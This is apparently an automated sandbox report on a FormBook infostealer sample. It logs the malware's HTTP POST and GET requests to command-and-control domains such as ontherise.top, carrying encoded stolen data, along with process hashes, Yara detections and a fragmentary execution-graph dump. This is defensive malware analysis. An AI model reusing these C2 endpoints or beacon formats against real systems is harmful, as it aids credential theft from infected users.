                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                                Dec 11, 2024 15:05:12.978710890 CET | 240 | IN | Data Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62
                                                                Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                19 | 192.168.2.7 | 49990 | 103.75.185.22 | 80 | 4508 | C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 11, 2024 15:05:14.074532986 CET | 1808 | OUT | POST /syud/ HTTP/1.1
                                                                Host: www.taxitayninh365.site
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 1253
                                                                Origin: http://www.taxitayninh365.site
                                                                Referer: http://www.taxitayninh365.site/syud/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Data Ascii: 9rKHjDxP=... [TRUNCATED]
Dec 11, 2024 15:05:15.634196997 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Connection: close
                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                content-type: text/html
                                                                content-length: 1238
                                                                date: Wed, 11 Dec 2024 14:05:15 GMT
                                                                server: LiteSpeed
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
Dec 11, 2024 15:05:15.634242058 CET | 240 | IN | Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.7 | 49991 | 103.75.185.22 | 80 | 4508 | C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 15:05:16.748859882 CET | 501 | OUT | GET /syud/?9rKHjDxP=gwko4eFZldhJcfMpXUu8nEIrrsK3aSdfj6+zOL8mAR+JwCfgYxN4oPNpnnwcuB8vQ1y33dVzUTzhe1i/ZlYVZSHwmSCiW0eRqUFBT2gRXL1+O05pXEJ5/rwABmaKZBakYxfHeQS7sPZ1&rLx0p=06jDTp00Q HTTP/1.1
                                                                Host: www.taxitayninh365.site
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Dec 11, 2024 15:05:18.320144892 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Connection: close
                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                content-type: text/html
                                                                content-length: 1238
                                                                date: Wed, 11 Dec 2024 14:05:18 GMT
                                                                server: LiteSpeed
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
Dec 11, 2024 15:05:18.320209980 CET | 240 | IN | Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.7 | 49992 | 162.0.213.94 | 80 | 4508 | C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 15:05:23.873699903 CET | 757 | OUT | POST /wr6c/ HTTP/1.1
                                                                Host: www.ontherise.top
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 221
                                                                Origin: http://www.ontherise.top
                                                                Referer: http://www.ontherise.top/wr6c/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Ascii: 9rKHjDxP=C0xkLyGCgnKq4bAGlzAIr6c/v/GfxIx1tjIZLhcDrZ0FWI6yZnKwCGOrlPCByk1e1rT5REAIuWgeTGvXcs7ZpaMRwUeo1fYGNFRfDBShUYSOu/5eZnpuIDipoG3VHzJTFP7edish1eQx+xkWGaCVQ/jSlGabay4lsyf001YIPLRBaOHaQsQUUxxbkWJkfYZFJAbnZwYRd8ZKHZG22g==
Dec 11, 2024 15:05:25.110471964 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Date: Wed, 11 Dec 2024 14:05:24 GMT
                                                                Server: Apache
                                                                Content-Length: 16052
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Dec 11, 2024 15:05:25.110522032 CET | 1236 | IN | Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
Dec 11, 2024 15:05:25.110558033 CET | 1236 | IN | Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
Dec 11, 2024 15:05:25.110594034 CET | 1236 | IN | Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
Dec 11, 2024 15:05:25.110630989 CET | 896 | IN | Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
Dec 11, 2024 15:05:25.110663891 CET | 1236 | IN | Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
Dec 11, 2024 15:05:25.110697985 CET | 1236 | IN | Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
Dec 11, 2024 15:05:25.110732079 CET | 448 | IN | Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
Dec 11, 2024 15:05:25.110778093 CET | 1236 | IN | Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
Dec 11, 2024 15:05:25.110805988 CET | 224 | IN | Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"
Dec 11, 2024 15:05:25.230357885 CET | 1236 | IN | Data Ascii: rx="2.5" cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterl


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.7 | 49993 | 162.0.213.94 | 80 | 4508 | C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 15:05:26.526210070 CET | 777 | OUT | POST /wr6c/ HTTP/1.1
                                                                Host: www.ontherise.top
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 241
                                                                Origin: http://www.ontherise.top
                                                                Referer: http://www.ontherise.top/wr6c/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Ascii: 9rKHjDxP=C0xkLyGCgnKq56wGnQoIg6c+gfGf7oxxtjMZLllIorQFWtGyYmKwBGOrxfCAvU1Z1qvxRGUIuXEeTG/XcbParKMT90fOxfYGNFRfDBWHUY6OvPpeYGptLDiu/23VDzIYFP6LdjwP1d4x+xUWGPiWe/jU6WbfTQ52syLu4noDCINHb4G4KOc4KgJggUtSI+EwLBf/USswCL8gKLnygffS4IFYcfjDollvYEQE0Gc=
Dec 11, 2024 15:05:27.755522013 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Date: Wed, 11 Dec 2024 14:05:27 GMT
                                                                Server: Apache
                                                                Content-Length: 16052
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Dec 11, 2024 15:05:27.755563974 CET | 1236 | IN | Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
Dec 11, 2024 15:05:27.755578995 CET | 1236 | IN | Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
Dec 11, 2024 15:05:27.755597115 CET | 1236 | IN | Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
Dec 11, 2024 15:05:27.755620003 CET | 1236 | IN | Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
Dec 11, 2024 15:05:27.755656958 CET | 1236 | IN | Data Ascii: 51,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533" d=
Dec 11, 2024 15:05:27.755672932 CET | 1236 | IN | Data Ascii: ke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45
Dec 11, 2024 15:05:27.755686998 CET | 108 | IN | Data Ascii: ,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.0660
Dec 11, 2024 15:05:27.755826950 CET | 1236 | IN | Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
Dec 11, 2024 15:05:27.755842924 CET | 1236 | IN | Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                                                                Dec 11, 2024 15:05:27.875495911 CET1236INData Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                                                                Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


Session ID: 23
Source IP: 192.168.2.7
Source Port: 49994
Destination IP: 162.0.213.94
Destination Port: 80
PID: 4508
Process: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe

Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 15:05:29.183300972 CET | 1790 | OUT | POST /wr6c/ HTTP/1.1
                                                                Host: www.ontherise.top
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 1253
                                                                Origin: http://www.ontherise.top
                                                                Referer: http://www.ontherise.top/wr6c/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Data Ascii: 9rKHjDxP=[TRUNCATED]
Dec 11, 2024 15:05:30.482270002 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Date: Wed, 11 Dec 2024 14:05:30 GMT
                                                                Server: Apache
                                                                Content-Length: 16052
                                                                Connection: close
                                                                Content-Type: text/html


Session ID: 24
Source IP: 192.168.2.7
Source Port: 49995
Destination IP: 162.0.213.94
Destination Port: 80
PID: 4508
Process: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe

Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 15:05:31.834573984 CET | 495 | OUT | GET /wr6c/?9rKHjDxP=P2ZEIELZ0UPa04kV9W8ohJ98vIa20Z9FlTIQAlVGqe01bp+GVEKkI1C60uSAlmlZ1ff3ZHYqpSh2Ykr2aNLluv5rxVbcwMo5N3ddLCq6QLz9p/hlfUxJPhq7oCzYOhUfK96Ibl0PndwU&rLx0p=06jDTp00Q HTTP/1.1
                                                                Host: www.ontherise.top
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Dec 11, 2024 15:05:33.099076033 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Date: Wed, 11 Dec 2024 14:05:32 GMT
                                                                Server: Apache
                                                                Content-Length: 16052
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8



                                                                Target ID:0
                                                                Start time:09:02:30
                                                                Start date:11/12/2024
                                                                Path:C:\Users\user\Desktop\01152-11-12-24.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\01152-11-12-24.exe"
                                                                Imagebase:0x8f0000
                                                                File size:1'229'312 bytes
                                                                MD5 hash:BE474451D52CCC6038809F5308EFFB59
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:7
                                                                Start time:09:02:33
                                                                Start date:11/12/2024
                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\01152-11-12-24.exe"
                                                                Imagebase:0xff0000
                                                                File size:46'504 bytes
                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1724224119.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1725678953.0000000005150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1725336677.0000000003840000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:10
                                                                Start time:10:12:54
                                                                Start date:11/12/2024
                                                                Path:C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe"
                                                                Imagebase:0x760000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3117803218.0000000004580000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:11
                                                                Start time:10:12:56
                                                                Start date:11/12/2024
                                                                Path:C:\Windows\SysWOW64\tzutil.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\tzutil.exe"
                                                                Imagebase:0x3a0000
                                                                File size:48'640 bytes
                                                                MD5 hash:31DE852CCF7CED517CC79596C76126B4
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3117606831.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3117644043.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3114871979.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:false

                                                                Target ID:12
                                                                Start time:10:13:09
                                                                Start date:11/12/2024
                                                                Path:C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe"
                                                                Imagebase:0x760000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3119039119.0000000004E10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:16
                                                                Start time:10:13:21
                                                                Start date:11/12/2024
                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                Imagebase:0x7ff722870000
                                                                File size:676'768 bytes
                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true


                                                                  Execution Graph

                                                                  Execution Coverage:3.5%
                                                                  Dynamic/Decrypted Code Coverage:0.4%
                                                                  Signature Coverage:8.9%
                                                                  Total number of Nodes:2000
                                                                  Total number of Limit Nodes:62
calls 105259->105260 105260->105258 105260->105259 105262 9153b2 __setmode 105261->105262 105263 9153c6 105262->105263 105264 9153de 105262->105264 105296 918b28 58 API calls __getptd_noexit 105263->105296 105271 9153d6 __setmode 105264->105271 105274 916c11 105264->105274 105266 9153cb 105297 918db6 9 API calls __setmode 105266->105297 105271->105036 105275 916c21 105274->105275 105276 916c43 EnterCriticalSection 105274->105276 105275->105276 105277 916c29 105275->105277 105278 9153f0 105276->105278 105279 919c0b __lock 58 API calls 105277->105279 105280 91533a 105278->105280 105279->105278 105281 915349 105280->105281 105282 91535d 105280->105282 105342 918b28 58 API calls __getptd_noexit 105281->105342 105288 915359 105282->105288 105299 914a3d 105282->105299 105284 91534e 105343 918db6 9 API calls __setmode 105284->105343 105298 915415 LeaveCriticalSection LeaveCriticalSection _fseek 105288->105298 105292 915377 105316 920a02 105292->105316 105294 91537d 105294->105288 105295 912d55 _free 58 API calls 105294->105295 105295->105288 105296->105266 105297->105271 105298->105271 105300 914a50 105299->105300 105304 914a74 105299->105304 105301 9146e6 __output_l 58 API calls 105300->105301 105300->105304 105302 914a6d 105301->105302 105344 91d886 105302->105344 105305 920b77 105304->105305 105306 915371 105305->105306 105307 920b84 105305->105307 105309 9146e6 105306->105309 105307->105306 105308 912d55 _free 58 API calls 105307->105308 105308->105306 105310 9146f0 105309->105310 105311 914705 105309->105311 105486 918b28 58 API calls __getptd_noexit 105310->105486 105311->105292 105313 9146f5 105487 918db6 9 API calls __setmode 105313->105487 105315 914700 105315->105292 105317 920a0e __setmode 105316->105317 105318 920a32 105317->105318 105319 920a1b 105317->105319 105320 920abd 105318->105320 105322 920a42 105318->105322 105503 918af4 58 API calls __getptd_noexit 105319->105503 105508 918af4 58 API calls __getptd_noexit 105320->105508 105326 920a60 105322->105326 
